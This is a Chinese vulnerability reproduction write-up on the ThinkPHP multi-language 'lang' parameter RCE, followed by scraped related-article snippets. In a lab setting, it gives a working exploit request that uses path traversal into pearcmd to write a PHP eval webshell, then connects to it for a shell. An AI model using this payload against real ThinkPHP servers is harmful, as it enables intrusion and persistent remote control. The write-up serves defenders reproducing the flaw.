1、产品简介

ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。

2、漏洞概述

如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

默认情况下,系统只会加载默认语言包,如果需要多语言自动侦测及自动切换,需要在全局的中间件定义文件中添加中间件定义。因此只有启用多语言并且使用存在漏洞的版本时才存在漏洞。

3、影响范围

v6.0.1 < Thinkphp < v6.0.13

Thinkphp v5.0.x

Thinkphp v5.1.x

4、环境搭建

使用vulfocus在线靶场环境进行复现

5、利用流程

1、开启靶场环境,直接访问漏洞地址bp抓包(注意路径)

2、发送请求到Reperater模块进行利用,这里我们直接写入一句话马子

exp如下:

?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_REQUEST['a']);?>+/var/www/html/a.php

3、使用中国蚁剑连接写入的马子,成功拿到shell环境,读取flag

这里主要是利用pearcmd.php这个pecl/pear中的文件。pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装。 不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在/usr/local/lib/php。由此看来该漏洞对Docker中运行的启用了多语言模块的ThinkPHP影响较大。

6、修复方案

官方已经发布最新版,请升级到最新版

ThinkPHP 多语言模块RCE漏洞复现相关推荐

  1. thinkphp 5.0.23 rce漏洞复现

    thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速.兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相 ...

  2. 用友php漏洞,用友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导 ...

  3. x友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...

  4. CVE-2019-15107 webmin RCE漏洞复现

    今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webadmin RCE漏洞复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成 ...

  5. 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

    禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...

  6. thinkphp lang命令执行(QVD-2022-46174)漏洞复现

    漏洞简介: ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架.当特定版本的ThinkPHP开启多语言功能,并且存在扩展pear时,攻击者可以构造lang参数实 ...

  7. 瑞友天翼应用虚拟化系统RCE漏洞复现+利用

    1.产品简介 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台.它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可 ...

  8. SamSung WLAN AP:RCE漏洞复现

    SamSung WLAN AP:RCE 一:漏洞信息 三星WLAN AP WEA453E路由器远程命令执行- 二:漏洞复现Fofa语法: Fofa语法: title=="Samsung WL ...

  9. (2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现

    1. 漏洞原理 spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 ...

最新文章

  1. 数据科学+python+R+数据库+机器学习+(速查表)cheat sheets大全
  2. 64位系统上使用*** Client端
  3. OpenCL异构并行计算编程笔记(2):命令队列与内存对象
  4. MySQL查询日志总结
  5. 百度转换经纬度为地址
  6. .NET开发中应该遵循的几点建议
  7. python装饰器函数执行后日志_python 装饰器理解
  8. ATL 开发 COM 过程中的一些经验、问题总结
  9. hive 的功能和架构
  10. iOS蓝牙4.0基础开发
  11. 数据库设计员工管理系统
  12. Android 12新功能:使用SplashScreen优化启动体验
  13. ssm(Spring+SpringMVC+MyBatis)台球室内乒乓球室体育器械租赁收费系统
  14. 香港云服务器选阿里云好还是腾讯云好?
  15. 电视html转vga没有声音,电脑用VGA线连接电视,怎么声音不能传进电视?
  16. word打开文档很久很慢_word文档 excel文档打开速度比较慢怎么办
  17. js字符串基本数据类型
  18. 基于微信奶茶外卖点餐小程序系统设计与实现 开题报告
  19. 【RED-V】开发环境搭建及快速入门
  20. 神经系统体格检查概要

热门文章

  1. Bootstrap的响应式导航栏
  2. Linux命令--top
  3. Laragon集成环境安装
  4. 苹果cms用宝塔定时采集+添加百度推送教程
  5. c属于什么语言,C语言属于什么语言
  6. 日更100天(42)每天进步一点点
  7. 临界区(临界段)的含义
  8. 你们要的线上GC问题案例来啦
  9. 25.Flink监控\什么是Metrics\Metrics分类\Flink性能优化的方法\合理调整并行度\合理调整并行度\Flink内存管理\Spark VS Flink\时间机制\容错机制等
  10. 什么叫显示动力学_ANSYS-什么叫显示动力学